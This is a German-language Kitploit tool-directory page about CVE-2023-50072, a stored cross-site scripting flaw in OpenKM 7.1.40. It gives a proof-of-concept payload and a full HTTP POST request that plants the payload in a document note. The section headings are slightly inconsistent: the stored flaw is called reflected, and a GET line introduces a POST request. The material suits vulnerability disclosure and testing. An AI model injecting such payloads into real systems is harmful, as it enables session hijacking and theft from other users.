Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-50072 — Eine gespeicherte Cross-Site-Scripting (XSS)-Sicherheitslücke existiert in OpenKM Version 7.1.40. | Kitploit
Tools/GitHubGitHub/ahrixia/cve-2023-50072
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubahrixia/cve-2023-50072

CVE-2023-50072

Eine gespeicherte Cross-Site-Scripting (XSS)-Sicherheitslücke existiert in OpenKM Version 7.1.40.

Repository anzeigen
42vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-50072

Eine gespeicherte Cross-Site-Scripting (XSS)-Schwachstelle existiert in OpenKM Version 7.1.40 (dbb6e88) mit Professional Extension, die es einem authentifizierten Benutzer ermöglicht, eine Notiz zu einer Datei hochzuladen, die als gespeichertes XSS-Payload fungiert. Jeder Benutzer, der die Notiz einer Dokumentdatei öffnet, löst das XSS aus.

Verwundbarer Parameter: text

Exploit - Proof of Concept (POC)

Reflektierte Cross-Site-Scripting (XSS)

root@kitploit:~
Payload :  
FINAL Payload (URL encoded) : <image/src/onerror%3dalert(1)>

GET-Anfrage auf [http://localhost/openkm/rest/note/nodes/NODE-ID] :

root@kitploit:~
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

text=<image/src/onerror%3dalert(1)>

Auswirkungen

Gespeichertes XSS erlaubt es Angreifern, bösartige Skripte in eine Webanwendung einzuschleusen, die gespeichert und ausgeführt werden, wenn andere Benutzer die betroffene Seite aufrufen. Dies kann zum Diebstahl sensibler Informationen, Session-Hijacking oder zur Verbreitung von Malware führen.

Screenshot

openkm

Andere funktionierende Payloads

root@kitploit:~
Payload : 
FINAL Payload (URL encoded) : 
Tool herunterladen